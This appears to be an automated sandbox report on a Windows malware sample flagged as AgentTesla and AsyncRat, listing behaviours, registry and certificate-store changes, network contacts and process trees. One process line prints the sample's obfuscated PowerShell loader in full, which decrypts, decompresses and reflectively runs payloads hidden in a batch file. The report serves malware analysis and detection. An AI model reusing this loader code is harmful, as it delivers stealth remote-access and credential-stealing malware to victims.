Analysis Overview
SHA256
b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318
Threat Level: Known bad
The file b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318 was found to be: Known bad.
Malicious Activity Summary
Modifies security service
Modifies firewall policy service
AgentTesla
AsyncRat
AgentTesla payload
Async RAT payload
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Looks up external IP address via web service
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Unsigned PE
Enumerates physical storage devices
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious use of UnmapMainImage
Modifies registry class
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies data under HKEY_USERS
Suspicious use of SetWindowsHookEx
Modifies Internet Explorer settings
Modifies system certificate store
Enumerates system info in registry
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-04 12:58
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-04 12:58
Reported
2024-06-04 13:00
Platform
win7-20240221-en
Max time kernel
122s
Max time network
138s
Command Line
Signatures
AgentTesla
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe | N/A |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe | N/A |
| N/A | N/A | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe | N/A |
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion | C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{1FA1FAA1-2272-11EF-B804-569FD5A164C1} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000017fe75b94b7814a98b6eff35b9c58bb00000000020000000000106600000001000020000000e960a04f42f0f6d1fca15e703955d9dfc16026ba94aeecbb60e810af92c1e5a1000000000e8000000002000020000000897c60fcee25c528047236312673393065b6bdd2ed5fba9bc35e4e794e7de37790000000c6bdb75a20cd560faaf2eb12cfc3eeae2edd2add0e5cf458f5771451112325f76e352ebed4b1e7e760b867873347cc8aa6300b9afab73b216dd422adfac4e45158ab475cdd624af6bbe3ad4a2ac91f4bb249cc85bcfe883047d2a4da3dd6b21584734144fb1583dd27cb97867c69cce78b8420faf8d793506aaea45bff01287b07d841a9a703471c4e75936b101bc5b54000000098b7a7b3d8be4bbedaffd765cf009843c3afac5f773183c501b661fafe159a4e8b1c4d37b640238412f7d3027b06e3d1b37c6d96c2a01b63cdea9b8d83c0e36a | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "423667770" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000017fe75b94b7814a98b6eff35b9c58bb00000000020000000000106600000001000020000000216da5fa9d55c2d2dd40903cb4fe719f622e73a75d828f3299a8233ee76a8a02000000000e8000000002000020000000d16bd029a8c3065afe25fa5ebda99a5112bff16538ac196944f52727b891dbe6200000007f1aa5379a7a25d4f99e7ccc157c6af8417398c00a87a47551f0f9ba63300ca7400000007e1902e8d1b918ff1541b1a6062b86ae7eb931e5535faedc1449a7ac33f5a69dcc38cd5d8feb27e5c8c568e7d0287b91b9491d20ab5c1ce5d3682ef186235b0e | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 40fddef47eb6da01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe
"C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\DeathAuthentication.bat" "
C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe
"C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kGHinQ79UkF9r+tuo/CjrBrZV+MXdja5YdUtk0ihi64='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('303KSumhAOwl+H8eZdZWMQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $QnNmF=New-Object System.IO.MemoryStream(,$param_var); $zyqXV=New-Object System.IO.MemoryStream; $DhAXC=New-Object System.IO.Compression.GZipStream($QnNmF, [IO.Compression.CompressionMode]::Decompress); $DhAXC.CopyTo($zyqXV); $DhAXC.Dispose(); $QnNmF.Dispose(); $zyqXV.Dispose(); $zyqXV.ToArray();}function execute_function($param_var,$param2_var){ $qvAaV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $IrdKD=$qvAaV.EntryPoint; $IrdKD.Invoke($null, $param2_var);}$sNNem = 'C:\Users\Admin\AppData\Local\Temp\DeathAuthentication.bat';$host.UI.RawUI.WindowTitle = $sNNem;$GQSoU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sNNem).Split([Environment]::NewLine);foreach ($pSNpQ in $GQSoU) { if ($pSNpQ.StartsWith('kxXxWsMoTNZTGgOQLuIn')) { $WGRDh=$pSNpQ.Substring(20); break; }}$payloads_var=[string[]]$WGRDh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://hackforums.net/member.php?action=profile&uid=5420967
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2752 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | keyauth.win | udp |
| US | 104.26.1.5:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| NL | 23.63.101.152:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | hackforums.net | udp |
| US | 104.23.128.79:443 | hackforums.net | tcp |
| US | 104.23.128.79:443 | hackforums.net | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| BE | 23.55.97.11:80 | x2.c.lencr.org | tcp |
| BE | 23.55.97.11:80 | x2.c.lencr.org | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
memory/2348-0-0x000007FEF52D3000-0x000007FEF52D4000-memory.dmp
memory/2348-1-0x00000000001D0000-0x0000000000BE8000-memory.dmp
memory/2348-2-0x000007FEF52D0000-0x000007FEF5CBC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\DeathAuthentication.bat
| MD5 | 9a3a9a5ba169eda2919b26e78abe3718 |
| SHA1 | ef2136796b2f2c88a9826968e14a72d34faff667 |
